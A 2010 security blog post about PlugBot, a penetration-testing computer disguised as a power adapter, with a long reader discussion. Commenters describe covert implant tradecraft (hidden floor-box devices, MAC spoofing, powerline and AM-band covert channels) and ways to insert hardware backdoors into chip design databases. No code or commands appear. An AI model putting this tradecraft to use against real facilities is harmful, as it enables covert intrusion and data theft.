PlugBot

Interesting:

PlugBot is a hardware bot. It’s a covert penetration testing device designed for use during physical penetration tests. PlugBot is a tiny computer that looks like a power adapter; this small size allows it to go physically undetected all the while powerful enough to scan, collect and deliver test results externally.

How do you use it?

Gain access to the target location (conference room?), plug the PlugBot in the nearest wall outlet and walk out. The PlugBot is configured to make an external connection (Wi-fi or Ethernet) to a specified IP address to receive instructions. Central Command allows the penetration tester to invoke scripts and applications. Output as a result of testing is encrypted and securely transmitted to the Drop Zone where data is imported into Central Command for analysis by the pen tester.

Note that it has a squid logo.

Posted on December 24, 2010 at 1:14 PM45 Comments

Comments

Stephan Zielinski December 24, 2010 2:00 PM

Er… the actual device does not exist yet, and may never exist. The image is a mock-up, and whoever’s working on making it a reality considers setting up a twitter account for it noteworthy enough to merit a mention on the “Updates” page.

Dennis December 24, 2010 2:02 PM

This is interesting, but the website seems to be light on details, unless I’m missing something. “Performs vulnerability tests” is very vague. Also, it is unclear if the device is able to handle connecting to networks with any type of certificate security. It says it is running Linux, so maybe this is a non-issue, but still, it could be a very light weight version missing some key features.

Brandioch Conner December 24, 2010 2:02 PM

From that site:
“PlugBot is a hardware botnet project.”

I’m more familiar with “botnet” meaning “zombies”.

“Covertly disguised as power adapter”

Not from the picture they’ve posted. It looks like it still takes a standard RJ45 plug. Maybe if they had a special data cable that resembled a regular wall-wort power cord …

How about a device that sits in-line with a regular data cable and steals the MAC address and IP address of the up-stream system?

Johnny December 24, 2010 2:36 PM

Very vague. Penetration testing? Does that mean you need to gain physical access to the network and plug an ethernet cable into Plugbot, that very conspicuous. Or does it perhaps use its wireless adapter for penetration attempts into the target network?

I think a quality microphone would be great too so you can relay overheard conversations.

Davi Ottenheimer December 24, 2010 3:08 PM

Note comment #7 from Scientific American

“7. gmperkins 07:07 PM 5/2/09

Good but not suprising answers.

But why are they called hackers? I'd figure a hacker would say: "Sneak into a building, plug it into a socket and their network, use it to monitor their network traffice/whatever"

That brick would be ideal for espionage."

tim December 24, 2010 3:20 PM

This is where good security architecture comes into play. A testing tool like a plugbot would be useless within our facilities.

However – most companies send their default route right out through the firewall, allow anything to be connected to the network, and allow anything to browse the internet. So I could see the utility there.

(i’ll buy one if it was available just to play with it)

Nick P December 24, 2010 3:52 PM

Nothing new. We’ve been doing this trick for a while with embedded boards and laptops. Aside from crypto, it’s actually why I loved the VIA Artigo: tiny, low power, and price makes it disposable. Just connect to their network, esp ethernet, in some hidden spot. The data is sent to a nearby PC, maybe another embedded board hidden in an accessible location with good antenna. The outside unit can passively accept data from the inside unit or actively relay instructions from the operator, who connects with his notebook via wired or wireless connection. The latter can reduce risk of exposing outside unit’s location. Point-to-point infrared connections and rarely monitored spectrum can reduce detection probability.

Joe December 24, 2010 5:14 PM

If you really want a interesting information, make something that can fit covertly on a coffee maker or water cooler. Then have it send the audio to a remote site.

Michael Hunter December 24, 2010 5:29 PM

As others have mentioned looks like a plug computer with some software on it. It is small, but in all the conference rooms I’ve used power is at a premium (people tend to want to always plug in their mobile computer). Also the way to get the data out is shaky. You have to either get on corporate wifi (not always available or sometimes needing authentication) or get a physical connection (and still need to get past any port authentication) which reduces your “cover”.

How about hiding in plain side and using cell technology. Maybe one of the chrome laptops. Leave it in a conference room corner and walk out. It can scan the world as it can get to it and push the information back upstream via the qualcomm gobi chip. You could even steal a wired connection and not look out of place.

Imperfect Citizen December 24, 2010 8:01 PM

I’m going to look around for those things in my house. We moved and an observer said it was only a 3 hour job to set up our house even with the security perimeter too. Something about a wireless frequency and the house is like an antenna? I don’t know what that meant. I did hear that my job was renewed for another year.

Cornerstone December 24, 2010 9:36 PM

It would be better if it looked like a camera battery charger with a slot for a battery and a flashing LED. That way someone needing the plug might not just pull it out in order to use the plug.

Marc W. December 24, 2010 10:14 PM

As far as hiding in a conference room/outlet issues — seems like the easiest thing to do would be to install it inside a surge protector strip, no? As long as the extra outlets were functional I wouldn’t imagine anyone turning it off or throwing it away. Also it would provide an excuse for any “suspicious” alternative ports and connections.

Carl December 24, 2010 11:42 PM

Cant really do much more than what you could do sitting in the parking lot with a laptop can it? Unless it has a microphone and/or web cam (which it doesnt seem to have). Most outfits have secured their WiFi.. guess if you could design one that looked like some kind of RJ45 cover/adapter and you could figure out how to power it, you could plug in and sniff the interior traffic. Sort of like this:
http://www.computerworld.com/s/article/9136179/Fake_ATM_doesn_t_last_long_at_hacker_meet
or this:
http://www.msnbc.msn.com/id/27085818/

Clive Robinson December 25, 2010 7:07 AM

@ Nick P,

“Nothing new. We’ve been doing this trick for a while with embedded boards and laptops. ”

Yup,

I used to put them under the false floor, due to the “set in floor” plates with power outlet and network and phone it’s the work of just a few minutes to replace the whole unit with a small computer modem etc all bolted on the underside.

The trick to remember is to use two network interfaces wher the MAC’s are fully programable.

You then program the “upstream port” with the “downstream device” MAC and the “downstream port” with the “upstream device” (switch/router/server) MAC. And if you want to do it properly you need a multipole relay and control CCT on the ports so when the tech comes around to check the line etc it switches the device out of CCT so it’s electricaly invisable when the Security people “walk the line”. Few, even the more paranoid of Securit techs ever do a full visual check along all the cables etc due to the cost (even in Max security areas they don’t do it instead they often opt for preasurised conduit as a cheaper option but that’s not as hard to bypass as people think).

With the advent of the “gumstick” linux micro’s with dual network ports and micro USB WiFi etc dongles I’ve been thinking of making one to fit on the back of a standard wall outlet face plate…

Dave December 25, 2010 7:17 AM

Er… the actual device does not exist yet, and may never exist.

Actually it does exist, it’s a Marvell Sheevaplug (or one of its many derivatives). So this is basically a COTS product combined with a fancy press release. Here’s a link to the plug computing wiki for those who are interested: http://computingplugs.com/index.php/Main_Page.

Dirk Praet December 25, 2010 2:40 PM

Interesting PoC, but probably of little use to anyone but insiders in network environments with MAC-address access control on routers & switches, EAP DHCP authentication and the like. Even with two programmable (spoofable) NICS, it would still be a challenge.

Seiran December 25, 2010 3:42 PM

A problem with these devices is that they are troublesome if (when?) discovered by someone who knows what they are, and they are not generally available off-the-shelf.

For a quick, inconspicuous and easily explainable backdoor into a network, the Apple AirPort Express or AirPort Extreme is an easy option. Users are always installing wireless devices even when they are told not to, and the cute design that screams “I’M A CONSUMER DEVICE!!” suggests this explanation. I had a personal hotspot in the library for months until one of my extra routers was discovered.

The AirPort Express looks like a Mac power adapter. Power plugs are hard to find in many places, but you’re sure to find one behind the Redbox, near the Power Card station at Dave & Busters and behind ATMs, right next to the convenient Ethernet jack. Everything you need to plug in and get to work on your important business.

RobertT December 26, 2010 9:06 PM

I’ve noticed that nobody has mentioned “powerline” modems as a data back haul option.

In the last few years this technology has really taken off and there are a lot of possibilities. Basically your options are Narrowband (40khz to 480khz) or broadband(2Mhz – 30Mhz)

The broadband can support very high data rates (over 100Mbps) but it is easy to detect due to RFI and has limited range.

The Narrowband systems can have a range of up to 1000m at data rates of up to 2Mbps. Narrowband systems are VERY difficult to detect from RFI you actually need to do a spectrum analysis of the AC line. Since the modern Narrowband systems use OFDM (about 100 carriers) with data typically 8DPSK (sometimes 16 QAM) it is VERY VERY difficult to detect the existence of a narrowband Powerline modem. It all just looks like a noisy AC signal (which is not unusual), most techs seeing this AC-line noise would suspect a failed Filter cap in a switched mode power supply, rather than intentional communications. Some narrowband systems have a feature to automatically configure as a Multi hop modem. This lets you make the TX power at the origin very low. With narrowband systems it is also possible to retrofit the MV=>LV AC transformer with a coupler so that you can monitor the MV from a respectable distance (important in US due to 110VAC)

Clive Robinson December 27, 2010 10:55 AM

@ Robert T,

As Nick P once said to me,

“Don’t give away all the trade secrets” 😉

I used to find that powerline was not to good in some places (think analog power factor correction) so I used to dump a DS-SS signal in the AM band ontop of the local strongest station, usually it would close couple and find it’s way out of a building somehow.

On a spec analyser the DS-SS looked like transmitter grass on the AM station (quite common on US stations back then), and on a typical “bug hunter” of the time it would come up as the AM station due to the bandwidth limitations of the equipment.

Typicaly the thing that would find it in a skilled techs hands was a “diode probe” type receiver that had the bandwidth and no demod filters and circuits to get in the way. Then a spectrum analyser and a suspicious mind might reveal what was going on but as it was on the power wiring and usually the structural steel as well, so it was not that easy to find even then.

Sins then the likes of R&S have put suitable filters in their specialised RX kit and it’s less difficult to find.

bob (the original bob) December 27, 2010 12:49 PM

I think it should have a flowery logo on it and have a commercially available scent oil cartridge in it. Put wording on it “change every 90 days” so people think it is supposed to be there.

RobertT December 27, 2010 8:25 PM

@Clive,
for frequencies below 500Khz power factor correction caps are a big problem, but not an impossible problem. You need to change the modulation and use OFDM. the presence of a PFC cap will make DSSS impossible to equalize, so you get killed by ISI.

Regarding Modulation:
BSK modulation is completely ruined by PFC caps, but Differential PSK modulations work OK (try Bluetooth 2 phy/4 DPSK). OFDM will also keep some of the channel’s unmodulated so that noise and Eq can be measured (approximated) for that region.

Detecting this signal is VERY difficult, especially at the lower frequencies because the AC mains make a very inefficient Antenna at 100Khz (especially in US) The systems that I have seen all use carriers at about 10dB below the system noise floor, so the modulation only shows up as an increase in the noise floor over a certain frequency range. Because it is AC-Mains you cannot turn it off and get a measure of the line noise with and without modulation. so all you see is slightly higher than expected noise bump. these days if you are trying to hide, than hiding behind the noise of typical computer switched mode power supplies is much better than using the AM stations. Even when a tech finds a signal, in a typical office there are 100 other local signal sources that all look similar.

Nick P December 31, 2010 5:35 PM

@ Jesse Krembs

Seems to be a lot of that going around. The tor router is a good example of research into an already-solved problem. I dont mind a set of diverse solutions, but things like this are just wasteful redundancy. Thats just… annoying.

Clive Robinson January 1, 2011 4:31 AM

Nick P,

“I dont mind a set of diverse solutions, but things like this are just wasteful redundancy”

Only if one is “ripping” the other,

The problem with this sort of device is the developers and is one that RobertT identifies over in the “Did the FBI Backdoor OpenBSD “thread,

“Now here’s the real conundrum, if you find this magical person [top flight developer] what makes you believe, for one second, that they won’t intentionally backdoor the system? They are probably a narcissist, so they’ll feel compelled to add a complex backdoor, just to prove how smart they are!”

Thus if you have two similar products from different developers made from the same FOSS source code modules you may well be able to check the binaries with respect to each other to see if they have put in a subtal backdoor etc. Which could be very valuable knowledge…

The thing is though it’s not only the “narcistic developer” you have to worry about, it’s all developers that are any good…

Because it’s the inquiring mind tempered by different experiances that produce the different outlook that sees the potential for a backdoor where others either don’t or have not yet thought of. And their outlook may just make them think putting a backdoor in is an investment in uncertain times, and thus “the ace up the sleave” in the game of life.

One of the odd things about the noncommercial secure code development model is in some respects it is “upside down” when compared to run of the mill comercial code development.

For instance “code review”, in most “code shops” this is not done by the best developers or those developers with a nack for finding bugs as these people are seen as to valuable to waste on such nonprofit activities. Likewise for those in “test” testing the code for functionality before release to the customers. Even if one of the best developers wanted to do code review or test thoroughly “short term share holder value” skews the pay and benifits model against them and in other ways prevents this from happening. In many places code review is only on user functionality not on finding “backdoors”.

The result is any capable developer with a little forethought can get a backdoor past the “code review” team with little difficulty (as I have demonstrated in the past).

But worse they can also get it into the final code base that gets “tested” and then signed off by that all important seal of approval the Private Key used to allow the code to be loaded as “good” by the end user.

Although I have been saying this for several years it is only with Stuxnet that it’s become suddenly obvious to people and they are starting to look.

And what have we found so far well,

We are seeing aplication developers for Apps on various smartphones puting very obvious “ET phone home” code in their products. Sometimes just as vanity kickers to the developer so they can see their code is being used sometimes for more sinister reasons.

Opps this stuff is compleatly unhidden and we are just finding it…

However with real money to be made these days covert backdooring of systems ordinary people use to speak to their bank or other financial institutions I think you can see has some potential…

But it does not end there devices such as these “Spy-warts”(TM) are “dual use” and the “legal users” don’t want the “targets” of their investigations to know they are being observed. Likewise the opposite is true, the “illegal/questionable” users don’t want their “targets” to know either. In either case the “target” is loosing information that is valuable to them and where there is value it can be capitalised by other people.

But it goes on from there, where there is valuable information it is also usually mutable and thus can be changed unbeknown by the “target” by the “observer” deploying the tool. But with a backdoor it can also be changed by the designer of the tool unbeknown to both the observer and the target. Thus opening up some very interesting avenues for capitalisation…

This is something I also bang on about with covert botnets started by fire and forget malware which although it technicaly falls into the definition of “APT” is way way more dangerous than the APT hawks appear to realise.

A lesson from history is that where there is conflict there are arms manufacturers making the “tools” of war and making a nice profit. As we know both sides buy these “tools” to fight each other thus like the “crack addict” they are at the wrong end of the deal and thus very dependent on their supplier.

Sometimes both sides buy from the same manufacturer… Which puts the manufacturer in a position where they can influence the progress and outcome of the conflict to their own advantage…

However such advantage only works in a way that is observable thus the effects are generaly limited (otherwise the manufacturer would go out of business).

However when it comes to information warfare we know from some of the “Ultra” history just how usefull information is and can thus be the “hidden hand of fate” which brings misfortune to an otherwise superior belligerent and luck to the inferior side. And information not being physical is a resourse that can be used over and over almost limitlessly.

We know from things like “The Man Who Never Was” that false information put in the right place at the right time can have very major and significant outcomes. And it is said that the CIA was responsible for a major disaster in Russia that had significant economic effect. Then there is Stuxnet caught almost by chance…

Now start thinking on what economic advantage such behaviour would be to various companies small and large. And what financial gain could be made sitting on the wall as an unknown “insider trader”…

Thus if these “spy-wart” devices are not backdoored the developers are potentialy a little behind the curve…

Nick P January 2, 2011 5:48 PM

@ Clive

Over the past year, I’ve been looking into ways of preventing backdoors. The best alternative I’ve seen to formal verification is a methodology that starts with precise requirements, then matches specs to requirements in a step-wise revision that gets more concrete at each level. Each more concrete step is connected in the SCM system to the more abstract function, module or spec above it and they are proven to correspond to each other via formal or informal arguments.

Formal examples using this approach include LOCK, GEMSOS, Integrity-178B, and seL4. Best informal examples include DO-178B requirements-spec-code mapping and the Cleanroom methodology. In each case, decomposition is used to break the application into functions/components of increasing granularity. The correspondence mapping ensures that the requirements are met and no extra functionality is introduced.

A simplified example would be breaking a function UpdateRecord(User,Balance) into subfuctions/subsections ConnectToDatabase(), SendDataToDB(User,Balance), and CloseDatabase. A reviewer who knows the definition of the subfunctions can look at how they are used to ensure they collectively meet the purpose of “UpdateRecord(User,Balance)”. Each subfunction will further be decomposed until the functionality is very simply verified. This eliminates easter eggs, too. It would be strange seeing code for a game engine or command shell in one of these routines. Hence, the advantage in preventing backdoors.

Another thing is how to handle the teams. The teams should be familiar with the right principles in architecture, design, testing, and coding. They should take a literate, modular, verifiable approach to coding. I think instead of having one team constantly programming and one constantly verifying, they should be swapped after each project or big section of a large project. This will ensure they are good at both tasks, preventing the worst developers from being on verification team. Might also measure who the best designers and bug hunters are and ensure at least one of each is on the proper team. I’d also have the best verifier watch the best developer’s work more carefully. 😉 The overall strategy I’ve presented should do more than prevent backdoors: expect increases in requirements met, reduction in testing, and improved quality in general. Cleanroom was scientifically proven to meet these claims, which is why most big RTOS vendors are using it for middleware development.

RobertT January 2, 2011 9:25 PM

NickP
I like what you are trying to do, because I’m a big believer in “formal verification” especially at the product definition and development level. I’m also a big fan of “compliance matrix testing” at the product level. Unfortunately focusing on the technical side of the security process ignores the weakest link, which is the people involved in the process.

Within chip development teams there is an unending supply of cerebral narcissists, the higher you climb, the more prevalent they become, it is almost a predilection for the job. Now what balances the team is the Inverted Narcissist, especially when the co-dependent is really the smarter of the two. The real trick is to construct a project where the Inverted Narcissist actually controls sign-off but the Classic Narcissist gets the glory. The reason this is important, is it puts the Classic into the role of the co-dependent so that the classic Narcissist supports the Inverted. Unlike the Classic the Inverted achieves glory in perfection, only that which can stand the review of the Classic is in any way “good enough”

That’s enough Psych101, but I would respectively suggest that as you strive for real EAL7 performance you will need to delve deeper into the Psyche of your developers.

Clive Robinson January 2, 2011 9:35 PM

Nick P,

“Each subfunction will further be decomposed until the functionality is very simply verified.”

Yup, I’m with you on that one, and all the process leading up to it.

If you remember on of my gripes about modern apps is the monolithic code block creating the unverifiable app. Usually written by code cutters that for various reasons don’t have the “security chops”.

The solution I suggested was that common functionality be broken down into individual functions of a “*nix ethos” scripting language by those with the “security chops” and that in addition each function would have a signiture profile that could be observed by a security hypervisor.

Thus code cutters could continue to cut apps but they did not have to worry about security at the lower levels. Further the signiture profile of the application script gets built automaticaly by the script “compile” or by the interpreter loader for the security hypervisor.

There would of course be some downsides for the code cutters, they would have to follow certain coding rules, however I don’t think they are realy any more onerous than those for cutting “thread safe” code for multiprocessor shared memory applications.

If you remember I then took the thought process forward to come up with the “prison-v-castle” idea such that each subfunction runs in it’s own just sufficient environment (prison) with communications between subfunctions mediated and controled by the security hypervisor (warden).

I’ve recently been modeling this using a modified “thread library” where the thread context switching could be done “premptivly” via a timer interupt which occasionaly runs a hypervisor to scan one of the “thread process spaces” to do “probabilistic detection” of abnormal behaviour by checking the code memory hash and heap space signatures. It is showing some promise but you do get a performance hit. One way to reduce this is to scan either the thread that is to be preempted or the prempting thread.

Scanning the (old) thread that is to be preempted alows you with a little forethought to catch program bugs as well such as logic errors where the stack grows unreasonably or loops are not exiting within a reasonable number of iterations.

Scanning the (new) thread that is prempting alows you to check for malware injected from another thread or process prior to it being run. Provided you have the inter thread comms suitably aranged you just reaload the thread code and clean out it’s stack, which has a similar hit as a page fault.

One of these days I’ll stop having fun fiddling with it and knock it into shape as more than just an ideas test bed.

Clive Robinson January 2, 2011 10:08 PM

@ Robert T,

With regards the dependance of code cutters…

I mentioned in the past I found code quality improved by making the anual bonus bassed on bugs found in other peoples code several years ago (actualy last century…).

That is the bonus starting point was based on the usual managment productivity measures of the time (lines of working code, sub functions compleated, milestones / targets met etc). But on top of this I put a points system where you got points for finding bugs in others code that got taken away from the writer of the bug. The number of points (upto 3) for each bug where decided by the other members of the team.

About 1/3rd of the bonus pot was awarded based on the number of points an individual had. There where also small monthly prizes (not usless awards of corperate deskweights).

It was interesting to see the dynamics of the group change. Those who stuck with “vicarious coding” practices (ie more lines of code the better, less testing the better) got less points and moved out of the team those with more “insightful coding” (ie better tested) got slightly better bonuses but those who had “solid coding” practices did not lose points and usually gained them from others simply because their code although produced at a slower rate per line did not usually require re-work after test.

RobertT January 2, 2011 10:42 PM

@Clive,

I’m not at all sure how to structure bonuses to achieve quality results.

IMHO the inverted narcissist is the most valuable team member, however he (or often she) is not motivated by personal achievement or wealth accumulation, but rather by achieving perfection in the eyes of the Classic Narcissist. There is a co-dependence relationship between the two so over rewarding one will destroy the symbiosis that makes the pair functional.

The problem is constructing the team dynamic, in such a manner, that both the Inverted and the Classic see that their needs are meet with this appearent role reversal. The other trick is maintaining code cutting productivity even with this backwards structure, otherwise it is easy to enter a product definition “forever loop”. It takes a strong manager with a sense of “good enough” to move the team forward.

I guess I’m fortunate that I’ve never needed to look at the Dollars per task metrics!

RobertT January 2, 2011 11:36 PM

@NickP
At the moment my interest is on Mobile computing viruses and ways to inject these viruses into chip definition databases.

For mobile devices, the holy grail, would be to compromise the ARM9 and ARM7 databases. Imagine a worm say like Stuxnet that could identify the ARM source database and modify this at a ‘C-code’ or Verilog level to insert an operation that intentionally leaks information relevant to typical crypto operations. You get side channels built in to ALL derivative products (basically EVERY smart phone) and supported at a level that most apps developers and code-cutters would consider impossible.

All manner of “zero day” attacks would be created, and new ones could be developed whenever an old hardware leak was fixed.

In theory this could all be done without the original developer even realizing that their processor definition database was corrupted!

From my experience most chip databases are only protected by typical Unix group permissions, I’ve never seen private key signing, implemented to control the incorporation of new features. Even tracking for source database modifications is rudimentary.

It’s a work in progress….

Clive Robinson January 3, 2011 4:54 AM

@ RobertT,

“From my experience most chip databases are only protected by typical Unix group permissions, I’ve never seen private key signing, implemented to control the incorporation of new features. Even tracking for source database modifications is rudimentary.”

Yup and the same applies to just about every change control system and design and manufacturing database I’ve ever worked on.

To be honest I cann’t remember many places I’ve worked at on the “electronics side” in the past do anything at all over and above put paper copies in a file cabinet. Even the best of them would only go as far as “stick it on a floppy” and “put it in the safe” (usually not A60 fire resistant). And this was the “final product” of a team of upto twenty different people over a six to eighteen month project…

In many places in my early days as an engineer I’d get a “flea in my ear” for “wasting time” if I tried to document a project at the close…

It used to go against the grain which is why I have in various filing cabinet’s most of my log books,the design notes, schematics, layouts, mechanical drawings, photoplots, test results, software print outs etc in both paper and magnetic media format (yup there’s eight hole punch tape, Holerith cards, eight inch floppies and other wierd storage in there).

At a couple of places I even built DBs around the Source Code Control system to store revision history in. The root trouble as always was “proprietary file formats”, and in some cases the only solution was to store either Postscript printer output or other common printer file format such as HPCL. And then there was engineer complacency with “yeah, yeah, I’ll do it tomorow, cann’t you see I’m busy right now!”.

One place I worked at all the engineering PC’s got stolen overnight along with all the various project files on the hard drives, it was a disaster.

To keep things going I brought in two of my own highend (for the time 486 16 meg memory, QIC tape drives running Unix) PC’s from home and used the backups I’d taken to get my team back up and running.

Belive it or not other engineeers including the chief engineer actualy said openly I must have been involved with the theft as I “had prepared for it”… Then when in my own defence I pointed out I had always taken “backups home” even before PC’s had been thought of, the next thing I know I’m being told it’s company property and somebody could steal company “trade secrets” from my home…

So yes after having put up with it for over 30years, I can understand your concern and also why you probably don’t stand much chance of getting the required security unless you are “top dog with real bite” and even then you will probably be hated for it even in a BSI-9000, Six-Sigma,… …,etc shop.

Remeber the mantra,

The rules are different in R&D,
production and Admin are FQA.
In R&D we slave for our pay,
as marketing dictate our way.
Walnut corridor has us slave,
for the profit shareholders crave.
Time and resources we have none,
Such is the life in R&D.

It might “fore warn you of stormy waters”.

With regards,

“I’ve never seen private key signing, implemented”

I used to fall about laughing whenever anybody sugested it as a “security measure”. The reason being is nobody outide a “triple layer armed guard” Mil/TLA facility appears to understand KeyMat issues and just what is involved with key handling. Though Bruce’s comments on this and PKI in the past suggest he has atleast considered it to the point of realising just how hard a problem it is.

Then there is the rear wards regression caused by the question “just what are we signing anyway?”

That is if the preceading steps are vulnerable what is the “code signing” going to achieve other than the equivalent of a poorly authenticated hash?

Especialy when “ease of use” is considered and each developer gets their own copy of the signing key or it is left at best “group read access” on a server…

The best it can offer when implemented correctly is an audit trail back to the signing certificate used to sign a given file potentialy at the time then on the signing machine.

What it does not do nor can it do is,

1, Atest to the quality of the code.
2, Atest to what real point in time it was signed.
3, Atest to which real person signed.
4, Atest to who originated the file.
5, Atest to who has modified the file.
6, Atest to when the file has been modifed.

etc etc, because of rule zero,

0, It does not have nor can it have any verifiable connection with the process or procedures that were used in the file creation or storage.

As an analogy it’s about the equivalent of me putting the code onto a CD, and writing the date I did it and the hash value indeliblly on the top and just putting it on a shelf in the entrance corridor…

Thus to be of use for traceability code signing has to work like a Rusian Doll with every change being the next signed doll outwards and the innermost doll being effectivly the signed blank file. Each entity involved needs to have it’s own signing key, thus each layer is effectivly signed atleast twice by the personal key and the machine they signed on key etc.

The obvious 20,000ft way to do this is to build the signing process into a secure revision control repository which issues each file for modification with a signed token in it which includes details of who checked the file out and when and from which revision point. When the file is checked back in it is signed by the system with the personal key of the person making the comit and a time/revision stamp signed by the secure repository. Obviously the secure repository needs to be “append only” etc, etc, etc.

As you can see as normal lots of “etc hand waving” over the details and with security as you know “the devil is in the details”…

It is in reality a very hard problem more so than the KeyMat or PKI problems which form a small subset of the issues.

Any way my coffee is getting cold so back to the grindstone 8)

Nick P January 4, 2011 4:19 PM

@ RobertT

We both share an interest in mobile security. My interest comes for two reasons: mobile devices are more important and useful than ever; mobile devices are making the same security mistakes that desktops and servers made early on. If we can secure them, then mobile devices can be used to help solve many larger issues like data loss prevention and credential management. Many people ask me why I don’t store a bunch of random passwords on my phone using KeePass or something. I reply that mobiles have essentially no security and any clever attacker targeting me could easily snatch everything. Hence my interest in using MILS RTOS’s in phones. Security starts with the chipset, though.

When I think of chipset security, a few issues come to mind: potential backdoors; attacks exploiting errata; attacks on trusted devices connected to processor, esp. w/ DMA (should be a four letter word, imho); glitches (intent or accident) that cause leaks/breaches/crashes (e.g. Intel MMU glitch & infamous MULTICS flaw); data remenance; EMSEC; physical attacks. When I write it all down, it’s amazing to see just how many issues one must solve before it’s even possible to secure the software. Mind-boggling.

So, first let’s talk backdoors. If you look at my list above, it can happen in several ways: hardware rootkit in SOC; intentional security-breaching glitches in SOC or trusted devices, either at interface or instruction set; working design that increases emanation properties. Everything except the rootkit could easily slip past a review team that doesn’t know what to look for, esp. emsec issues. One research team already made a hardware rootkit to be slipped into the VHDL or Verilog and it only took up a little space. Review team might catch that, but if their repository is insecure it could be inserted in a form of MITM attack. Very real risk, here.

Another concern is that there are so few fabs for chips. I mean, how many fabs are there that turn the blueprints into actual silicon for ARM, POWER, MIPS and x86 CPUs? Idk, but it’s definitely a small number compared to the chip output. Subverting even one would allow backdoors into many, many devices. It’s a real concern to me, esp. if security is as bad as you say. I would say American companies who are concerned should use a DOD-certified fab, but then what’s the risk of DOD backdoors? And are those fabs’ repositories any more secure than foreign ones? Hard to say for outsiders like me.

I think the only solution here is onshore, DOD audited, highly secure fabs that produce chips from authenticated code. At the company submitting the hardware design, a review team might look at their secure repository at the changes and make sure they are traceable. I think Clive’s append-only, every change is signed and explained kind of design is necessary. It also meets the DO-178B style traceability requirements I mentioned, which are essential to counter backdoors. Let’s look into how to design the system to counter external and internal threats.

I’d treat the repository system as a secure enclave. It must be physically secure and tamper-resistant, of course. Few should have access to it and they should be monitored by others. If internet access is necessary for any reason, then all connections to the system should be over a VPN using a dedicated plug-and-play appliance with excellent security and little internal state (Sirrix comes to mind). The signing solution should be hardware so employees can each have one. Developers make changes, explain them, sign them, and send them to the repository. They are merged based on policy, automated or manual. The final version is produced in an automated fashion, timestamped, hashed, and signed. The first exchange of signing keys and identifying information between client and fab will be rigorously protected, then the client’s systems will rigorously protect the signing key.

This system should be made very simply and using a low-defect methodology, running on a minimal safety-critical RTOS. Might even put a gateway between it that converts Ethernet and TCP/IP to a simplified protocol and non-DMA hardware. Another concern is complex, error-prone dev tools and OS’s developers will use. I’d say give them two computers: one to do development on; one that does the signing and displays contents for verification of integrity before signing. They’d be connected by a secure transfer mechanism, perhaps a data diode. The signature computer would be very simple and highly secure. It would be connected to the repository with write access, while the other system only has read access. A KVM switch, perhaps Tenix’s, would let the engineer switch between to ensure he’s signing what he thinks he’s signing.

I’d rather them not work on the stuff at home, but this might not be possible to prevent. In this event, I’d say company provided MILS kernel laptops are the only option a.t.m. that provides portability, security, and COTS hardware. One partition would be the verification/signing, one the dev machine, high assurance interface manager prevents spoofing, and the secure information transfer agent along with MILS mandatory info flow policy would ensure the data moved in the right directions. INTEGIRTY Workstation has all this out of the box and I think on a Dell laptop. LynxSecure and Turaya Desktop have potential too, but idk about their hardware & middleware. If x86 is required, I’d use a Core i7, disable all the bloat, and use the IOMMU to keep devices from causing problems. I’d also glue the USB ports and, if it had firewire ports, fire the procurement guy. 😉

I think the design strategy allows for EAL7-level verification of many components, some of which already have (Integrity-178B, Tenix Data Diode). Many medium assurance components exist for the rest and at least three commercial offerings with support staff. It seems like we could solve this problem now. So, what you think of all this?

RobertT January 4, 2011 10:35 PM

@Nick P

Too many points to address immediately let me try to get us moving in the right direction.

Fabs for Mobile chip sets:
Most new devices today are being targeted at 40nm processes
There are only 6 fabs in the world capable of producing volume designs at 40nm, these are
1) TSMC (Taiwan)
2) Global Foundries (Abu dhabi) (old Chartered semi and AMD fabs)
3) maybe UMC (not sure when 40nm available) (Taiwan)
4) Samsung (not really a foundry) (S. Korea)
5) Intel (zero presence in mobile device market)
6) IBM (no mobile presence)

The physical security of the mobile device fab production needs to happen in Taiwan (TSMC/UMC), Singapore (old Chartered Semi) and South Korea (Samsung).

As far as I know, neither Intel nor IBM is fabing any mobile devices, neither are the old AMD fabs in Dresden Germany (now Global) nor the old IBM / Freescale fabs in US.

Interfering with a database after delivery to the fab:
This is possible but highly unlikely because the fab deliverable is typically at a physical layout level (called GDS2 or Mebes data). With an automatically placed “sea of gates” layout/ routing , it is difficult (not impossible) to translate this back into a simulation / human understandable form. However, identifying features like “hard macros” such as a hand layed-out Wallace tree multiplier is fairly easy. Adding several traces to say, copy the Carry out flag or certain bits of the multiplier is possible. (Big problem is that the extra signals could reduce the execution speed of the block, which would cause someone to look at the chip layout (40nm is way below what we can see with visible light so an optical microscope is useless, to actually know exactly what is on the chip requires inspection layer-by layer with a SEM / FIB microscope) = EXPENSIVE!

Often these days the Fab will supply certain hard macros, such as a PLL which the chip vendor uses sight unseen. Having an undocumented register within the fab supplied PLL block and then routing multiply signals to the undocumented registers, is in theory possible.

What I’m trying to demonstrate is that it is probably beyond the capabilities of anyone but a state actor to modify a design at the fab level. The other factor limiting this is that the client expects the chips back in under 2 months. not much time to make modifications.

Modifying the Chip database:

For cost reasons Mobile chips are Systems on a Chip (SOC) designs, they contain over 10M transistors and can often have 4 or more main processor cores and as many as 8 state machines (these are often actually small 8 bit microcontrollers). I can guarantee you that the person working on the AES hardware function does not know what happens at the mobile protocol stack level, although both functions are on the one chip. Similarly the Protocol Stack person would never have reason to look into the inner workings of the power management microcontroller. So at the chip top “block assembly” level it would be easy to add undocumented registers that allow these blocks to communicate, thereby creating backdoors. The best location for the backdoors is probably within the least technically difficult blocks, such as within the power management microcontroller or HID interface micro. Both of these are also ideal locations for introducing unexpected side channel communications paths.

As an external person modifying a top level chip data base it would be possible to add undocumented registers by connecting up unused gates. Normally a new chip design adds extra gates into unused spaces between blocks so that minor errors can be easily patched. Nobody is “in charge” of the extra gates and having some used, even at the beginning, is not unusual (typically extra resister gets added to help with timing errors or control signals get inverted / delayed to synch blocks that kind of thing) so it would not be unusual to see these gates used and nobody would wonder what that function does….(basically it s just some added “glue logic”).

More tomorrow:

RobertT January 5, 2011 12:13 AM

@Nick P
Lots of interesting ideas about chip database security, but believe me NONE of these security barriers exists.

Total system security:
Unix systems without direct web access
Citrix access to windows server is sometimes possible
some systems are completely stand-alone secure, but most designs require disperse teams around the world to access the database so it is typically accessible via a VPN link.

windows machines and Unix machines are normally on separate network domains.

Chip Database Security :
Unix group permissions (sorry that’s it nothing more) Some development software has added security features but it is always disabled.
Usually logs exist for block access and exception / access failure logs also exist but they are only read when a security breach is suspected.

Clive Robinson January 5, 2011 2:42 AM

@ RobertT,

“Some development software has added security features but it is always disabled”

No doubt for “improved workflow” reasons 🙁

“Usually logs exist… …but they are only read when a security breach is suspected.”

Ouch…

With all the security features disabled what would it take to ‘make them suspect’?

